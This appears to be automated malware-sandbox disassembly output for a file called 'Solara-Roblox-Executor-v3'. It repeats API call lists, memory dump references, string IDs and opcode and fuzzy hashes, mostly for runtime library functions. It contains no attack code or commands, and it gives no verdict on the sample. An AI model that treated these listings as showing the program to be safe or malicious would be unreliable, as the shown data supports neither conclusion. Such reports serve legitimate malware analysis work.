                                                                                          • Associated: 00000000.00000002.2024258696.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024305761.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024328423.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024347677.0000000000321000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024368925.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024387098.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2f0000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                          • String ID:
                                                                                          • API String ID: 158306478-0
                                                                                          • Opcode ID: ec15d9fdc9c520507ab4dd1ac4573f666a94cf7f0bdadb3c7771ce7d888ab551
                                                                                          • Instruction ID: 86431c51ab962513408612365fffe231b11f54c46717b7f6ea055fd0b1fc018d
                                                                                          • Opcode Fuzzy Hash: ec15d9fdc9c520507ab4dd1ac4573f666a94cf7f0bdadb3c7771ce7d888ab551
                                                                                          • Instruction Fuzzy Hash: 7A11C4F2A1361D7FE71367B65CADCBF799CDE893947215215F801D5181FA22CD0189B0
                                                                                          APIs
                                                                                          • WriteConsoleW.KERNEL32(00000000,?,?,00000000,00000000,?,003139DF,00000000,00000001,?,?,?,0030DB40,?,00000000,00000000), ref: 003144A7
                                                                                          • GetLastError.KERNEL32(?,003139DF,00000000,00000001,?,?,?,0030DB40,?,00000000,00000000,?,?,?,0030D486,?), ref: 003144B3
                                                                                            • Part of subcall function 00314510: CloseHandle.KERNEL32(FFFFFFFE,003144C3,?,003139DF,00000000,00000001,?,?,?,0030DB40,?,00000000,00000000,?,?), ref: 00314520
                                                                                          • ___initconout.LIBCMT ref: 003144C3
                                                                                            • Part of subcall function 003144E5: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00314481,003139CC,?,?,0030DB40,?,00000000,00000000,?), ref: 003144F8
                                                                                          • WriteConsoleW.KERNEL32(00000000,?,?,00000000,?,003139DF,00000000,00000001,?,?,?,0030DB40,?,00000000,00000000,?), ref: 003144D8
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2024276278.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2024258696.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024305761.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024328423.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024347677.0000000000321000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024368925.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024387098.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2f0000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                          • String ID:
                                                                                          • API String ID: 2744216297-0
                                                                                          • Opcode ID: 39d2a3a883bdcc76d94be3b095264aa631e4d844b145ca191bec13d37be3ff53
                                                                                          • Instruction ID: 8a6193ecb3d0c67ba0887ea8c4fd6cc0f5a06ebac7bcc86c7082a96b920ff16e
                                                                                          • Opcode Fuzzy Hash: 39d2a3a883bdcc76d94be3b095264aa631e4d844b145ca191bec13d37be3ff53
                                                                                          • Instruction Fuzzy Hash: 9DF0AC3A511224BBCF271F96EC08AD93F6AFB4D7A1F058514FE1895120DA368861AB90
                                                                                          APIs
                                                                                            • Part of subcall function 0030594A: GetLastError.KERNEL32(00000000,?,00307CCD), ref: 0030594E
                                                                                            • Part of subcall function 0030594A: SetLastError.KERNEL32(00000000,?,?,00000028,00301F93), ref: 003059F0
                                                                                          • GetACP.KERNEL32(-00000002,00000000,?,00000000,00000000,?,002FF809,?,?,?,00000055,?,-00000050,?,?,?), ref: 0030A1E5
                                                                                          • IsValidCodePage.KERNEL32(00000000,-00000002,00000000,?,00000000,00000000,?,002FF809,?,?,?,00000055,?,-00000050,?,?), ref: 0030A21C
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2024276278.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2024258696.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024305761.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024328423.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024347677.0000000000321000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024368925.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024387098.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2f0000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLast$CodePageValid
                                                                                          • String ID: utf8
                                                                                          • API String ID: 943130320-905460609
                                                                                          • Opcode ID: d7f833043c1edcac839ebdaf0b3d5e7aa61723003d9b5863da417ba959760ed6
                                                                                          • Instruction ID: 658267192c86c197c2f7b75b07df88f0ec748f7025e6c9f7368984af5e7cee46
                                                                                          • Opcode Fuzzy Hash: d7f833043c1edcac839ebdaf0b3d5e7aa61723003d9b5863da417ba959760ed6
                                                                                          • Instruction Fuzzy Hash: 9C51E435602B05AADB2BAB74AC62BB673ACEF08710F154469F9459B4C1F770ED4087A3
                                                                                          APIs
                                                                                          • EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,00305071,?,?,00000000,00000000,00000000,?), ref: 00305195
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2024276278.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2024258696.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024305761.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024328423.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024347677.0000000000321000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024368925.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024387098.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2f0000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID: EncodePointer
                                                                                          • String ID: MOC$RCC
                                                                                          • API String ID: 2118026453-2084237596
                                                                                          • Opcode ID: e1a57b030015993372e6c80971cf1296ef963a529b3c7ec3fc4e3d81fea47544
                                                                                          • Instruction ID: a75b7c3fcd5a6599d30866f7b0a95d2a0950c7bdfe87b5d6c4ce8da447aab61d
                                                                                          • Opcode Fuzzy Hash: e1a57b030015993372e6c80971cf1296ef963a529b3c7ec3fc4e3d81fea47544
                                                                                          • Instruction Fuzzy Hash: 50418972901609AFCF16CF94CD91AEEBBB9FF08300F198559FA08A7291D335A960DF51
                                                                                          APIs
                                                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 00304C53
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2024276278.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2024258696.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024305761.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024328423.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024347677.0000000000321000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024368925.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2024387098.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2f0000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID: ___except_validate_context_record
                                                                                          • String ID: csm$csm
                                                                                          • API String ID: 3493665558-3733052814
                                                                                          • Opcode ID: 30096fd3b235c13a08d79907d845b06f782269a1d36f0d5be9c659e9e70a24b3
                                                                                          • Instruction ID: 16d26096d88cd589c83425e7f0a1c6741f06e0d2c284a79a4f949a6c62786931
                                                                                          • Opcode Fuzzy Hash: 30096fd3b235c13a08d79907d845b06f782269a1d36f0d5be9c659e9e70a24b3
                                                                                          • Instruction Fuzzy Hash: 6A3139B2413208EBCF239F40DC1496E7B66FF48315B1A4259FE140E1A2C332CEA1DB81
                                                                                          APIs
                                                                                          • GetLocaleInfoW.KERNEL32(?,2000000B,0030AB6D,00000002,00000000,?,?,?,0030AB6D,?,00000000), ref: 0030B250
                                                                                          • GetLocaleInfoW.KERNEL32(?,20001004,0030AB6D,00000002,00000000,?,?,?,0030AB6D,?,00000000), ref: 0030B279
                                                                                          • GetACP.KERNEL32(?,?,0030AB6D,?,00000000), ref: 0030B28E
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2022971147.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                          • Associated: 00000003.00000002.2022954606.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2022998411.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2023013624.0000000000320000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2023031226.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2023048343.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2f0000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID: InfoLocale
                                                                                          • String ID: ACP$OCP
                                                                                          • API String ID: 2299586839-711371036
                                                                                          • Opcode ID: 5a24de6e143096b6eb4830321ade4b63f531cb6dd518be764b5923440ff6e6ea
                                                                                          • Instruction ID: abcaf97f236f6d72d2a5043d4d062305fce9e4913a61c9d438fdd12d8d4a9a30
                                                                                          • Opcode Fuzzy Hash: 5a24de6e143096b6eb4830321ade4b63f531cb6dd518be764b5923440ff6e6ea
                                                                                          • Instruction Fuzzy Hash: BA21C532A02100AADB378F64C925B9FF3AEEF54F50B578824E90ADB294E732DD41C350
                                                                                          APIs
                                                                                            • Part of subcall function 0030594A: GetLastError.KERNEL32(00000000,?,00307CCD), ref: 0030594E
                                                                                            • Part of subcall function 0030594A: SetLastError.KERNEL32(00000000,?,?,00000028,00301F93), ref: 003059F0
                                                                                          • GetUserDefaultLCID.KERNEL32(-00000002,00000000,?,00000055,?), ref: 0030AB3F
                                                                                          • IsValidCodePage.KERNEL32(00000000), ref: 0030AB7D
                                                                                          • IsValidLocale.KERNEL32(?,00000001), ref: 0030AB90
                                                                                          • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 0030ABD8
                                                                                          • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 0030ABF3
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2022971147.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                          • Associated: 00000003.00000002.2022954606.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2022998411.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2023013624.0000000000320000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2023031226.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2023048343.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2f0000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                          • String ID:
                                                                                          • API String ID: 415426439-0
                                                                                          • Opcode ID: 3d2d6d29811e6dd5a2ef457e8a429424617a3065dde9c060e0c081771f644213
                                                                                          • Instruction ID: 78f7f2b1c54494b9cc86126a0cf5c21d200e17ef3dc06c8e622420efaa23a78a
                                                                                          • Opcode Fuzzy Hash: 3d2d6d29811e6dd5a2ef457e8a429424617a3065dde9c060e0c081771f644213
                                                                                          • Instruction Fuzzy Hash: 27519471A027059FEB12DFA8EC55ABE73B9FF09700F064529E901EB1D0E7709940CB62
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2022971147.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                          • Associated: 00000003.00000002.2022954606.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2022998411.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2023013624.0000000000320000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2023031226.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2023048343.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2f0000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 5bda445c65ae4a74fe40377494680e1620293ac17931db5f8abb93f471be9a26
                                                                                          • Instruction ID: 781ac102b92681d1c59e79af2b9a988f987b3972b0fb4f9c7752eb7cbea5dee2
                                                                                          • Opcode Fuzzy Hash: 5bda445c65ae4a74fe40377494680e1620293ac17931db5f8abb93f471be9a26
                                                                                          • Instruction Fuzzy Hash: 12025DB1E022199BDF15CFA9C8906AEFBF5FF48314F258269E515E7380D731AA45CB80
                                                                                          APIs
                                                                                          • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0030B889
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2022971147.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                          • Associated: 00000003.00000002.2022954606.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2022998411.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2023013624.0000000000320000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2023031226.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2023048343.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2f0000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID: FileFindFirst
                                                                                          • String ID:
                                                                                          • API String ID: 1974802433-0
                                                                                          • Opcode ID: ed6d3f5963cacb5856f8abfcd13160ffb26f2d0826c8c14d08cddb1e6d9119f8
                                                                                          • Instruction ID: cf24d8ac30b336bc370e792addcc6b196c9a7d920ebea12d0ea301eb76e1225b
                                                                                          • Opcode Fuzzy Hash: ed6d3f5963cacb5856f8abfcd13160ffb26f2d0826c8c14d08cddb1e6d9119f8
                                                                                          • Instruction Fuzzy Hash: C271E47190615C5FDF22AF28CCA9AFAF7B8EF49300F1541D9E409A7291DB314E849F10
                                                                                          APIs
                                                                                          • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 002F9A7F
                                                                                          • IsDebuggerPresent.KERNEL32 ref: 002F9B4B
                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 002F9B64
                                                                                          • UnhandledExceptionFilter.KERNEL32(?), ref: 002F9B6E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2022971147.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                          • Associated: 00000003.00000002.2022954606.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2022998411.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2023013624.0000000000320000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2023031226.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2023048343.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2f0000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                          • String ID:
                                                                                          • API String ID: 254469556-0
                                                                                          • Opcode ID: 538e5e99ae8c940ea308202c186440ca882a03ee1086d5b766757a485f921c68
                                                                                          • Instruction ID: df8069bf4fc76e0afe065c92a68902d7d536987cf68e06bfe3353b8ffba49f93
                                                                                          • Opcode Fuzzy Hash: 538e5e99ae8c940ea308202c186440ca882a03ee1086d5b766757a485f921c68
                                                                                          • Instruction Fuzzy Hash: 8D312575D0522D9BDB21EFA4D949BCDBBB8AF08340F1041EAE50CAB250EB719A848F45
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2022971147.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                          • Associated: 00000003.00000002.2022954606.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2022998411.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2023013624.0000000000320000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2023031226.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2023048343.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2f0000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressCloseFileHandleProcSize
                                                                                          • String ID: CreateFileA$Pq/
                                                                                          • API String ID: 2836222988-331590095
                                                                                          • Opcode ID: 66a3620b4751056ed5221200ed29f7dc21a8f7d613c8f31eb845318556bb3012
                                                                                          • Instruction ID: bedc6e20c0689bbde8d745d213f420aa8c0adedb6f72d0820bfd4c0fdedde267
                                                                                          • Opcode Fuzzy Hash: 66a3620b4751056ed5221200ed29f7dc21a8f7d613c8f31eb845318556bb3012
                                                                                          • Instruction Fuzzy Hash: 2341B3B0D18209DFDB00EFA8D4986AEBBF0EF48354F00852DE899A7350D7759959CF92
                                                                                          APIs
                                                                                          • _ValidateLocalCookies.LIBCMT ref: 002FABE7
                                                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 002FABEF
                                                                                          • _ValidateLocalCookies.LIBCMT ref: 002FAC78
                                                                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 002FACA3
                                                                                          • _ValidateLocalCookies.LIBCMT ref: 002FACF8
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2022971147.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                          • Associated: 00000003.00000002.2022954606.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2022998411.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2023013624.0000000000320000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2023031226.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2023048343.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2f0000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                          • String ID: Pq/$csm
                                                                                          • API String ID: 1170836740-730822195
                                                                                          • Opcode ID: 7c899a1a01531eea94985670a35347b987e9bcf83493a61184a7444ba776160e
                                                                                          • Instruction ID: 56d6be585b488bd76e0bdfca6849cfb0b9a6b9b2ded52928ee3ea945301bf2c8
                                                                                          • Opcode Fuzzy Hash: 7c899a1a01531eea94985670a35347b987e9bcf83493a61184a7444ba776160e
                                                                                          • Instruction Fuzzy Hash: 5F41F870A1121D9BCF11DF68C845AAEBBB5BF04364F148166E9189F392C731DD11CF92
                                                                                          APIs
                                                                                          • GetCPInfo.KERNEL32(00000000,00000000,00000000,7FFFFFFF,?,003141BD,00000000,00000000,00000000,00000000,?,?,?,?,00000000,00000000), ref: 00314278
                                                                                          • __alloca_probe_16.LIBCMT ref: 00314333
                                                                                          • __alloca_probe_16.LIBCMT ref: 003143C2
                                                                                          • __freea.LIBCMT ref: 0031440D
                                                                                          • __freea.LIBCMT ref: 00314413
                                                                                          • __freea.LIBCMT ref: 00314449
                                                                                          • __freea.LIBCMT ref: 0031444F
                                                                                          • __freea.LIBCMT ref: 0031445F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2022971147.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                          • Associated: 00000003.00000002.2022954606.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2022998411.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2023013624.0000000000320000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2023031226.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2023048343.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2f0000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID: __freea$__alloca_probe_16$Info
                                                                                          • String ID:
                                                                                          • API String ID: 127012223-0
                                                                                          • Opcode ID: 94b257b404c86832abb627468ecaf1d59e8216818ed1db8e46c2c26b96a37bd5
                                                                                          • Instruction ID: deafa06ac2bc7d9666ee728d5b712a439a775c4b80e44c9deb9a0355c0cfb9f0
                                                                                          • Opcode Fuzzy Hash: 94b257b404c86832abb627468ecaf1d59e8216818ed1db8e46c2c26b96a37bd5
                                                                                          • Instruction Fuzzy Hash: 0871E3329002499BDF2A9E95CC41BFF7BA9AF4D750F2A0469F914BB281DA359CC18B50
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2022971147.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                          • Associated: 00000003.00000002.2022954606.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2022998411.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2023013624.0000000000320000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2023031226.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2023048343.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2f0000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID: _strrchr
                                                                                          • String ID:
                                                                                          • API String ID: 3213747228-0
                                                                                          • Opcode ID: b258c23f8f5adf4b5b829db56bad2fb8a7efe0f2db3ca2ba46b92337591bc9f9
                                                                                          • Instruction ID: 0681bc504546505fd2062856053beaf49c29e4e7ca0129c5f9872ae847f0e050
                                                                                          • Opcode Fuzzy Hash: b258c23f8f5adf4b5b829db56bad2fb8a7efe0f2db3ca2ba46b92337591bc9f9
                                                                                          • Instruction Fuzzy Hash: B8B168329023559FDB178F28CCA1BEEBBA5EF55710F258165E984AF2C2DB74D801C7A0
                                                                                          APIs
                                                                                          • type_info::operator==.LIBVCRUNTIME ref: 00304E6B
                                                                                          • CallUnexpected.LIBVCRUNTIME ref: 003050E4
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2022971147.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                          • Associated: 00000003.00000002.2022954606.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2022998411.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2023013624.0000000000320000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2023031226.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2023048343.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2f0000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID: CallUnexpectedtype_info::operator==
                                                                                          • String ID: csm$csm$csm$xf1
                                                                                          • API String ID: 2673424686-3925582995
                                                                                          • Opcode ID: d887cadcedc2e3b39ec5782712b2c19715057a8d36884e887ad43fcc82a8e552
                                                                                          • Instruction ID: 2abc048214e0d54a82fd9756429a194f7da16b711221aba0b6d07c22957d0397
                                                                                          • Opcode Fuzzy Hash: d887cadcedc2e3b39ec5782712b2c19715057a8d36884e887ad43fcc82a8e552
                                                                                          • Instruction Fuzzy Hash: 08B18EB1802209EFCF16DFA4C8619AFB7B5FF04300F15456AEA146B292D771DA61CF91
                                                                                          APIs
                                                                                          • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,00000000,?,BB40E64E,?,00306751,00000000,00000000,00000000,00000000), ref: 00306703
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.2022971147.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                          • Associated: 00000003.00000002.2022954606.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2022998411.0000000000316000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2023013624.0000000000320000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2023031226.0000000000324000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000003.00000002.2023048343.0000000000327000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_2f0000_Solara-Roblox-Executor-v3.jbxd
                                                                                          Similarity
                                                                                          • API ID: FreeLibrary
                                                                                          • String ID: api-ms-$ext-ms-
                                                                                          • API String ID: 3664257935-537541572
                                                                                          • Opcode ID: 51d559aac10d1bcf0345f83014e65bc3a103dcbeb0f29ca8f01c64a005c81121
                                                                                          • Instruction ID: bd08ebe80ec6e7023f5fcdfb512efd8b01ced730dba88331c8ab5d829bd6a833
                                                                                          • Opcode Fuzzy Hash: 51d559aac10d1bcf0345f83014e65bc3a103dcbeb0f29ca8f01c64a005c81121
                                                                                          • Instruction Fuzzy Hash: 21212732A03218ABD7339B24DC62B9A336C9B45770F270124FD11A72D5EB32ED20C6E0
                                                                                          APIs
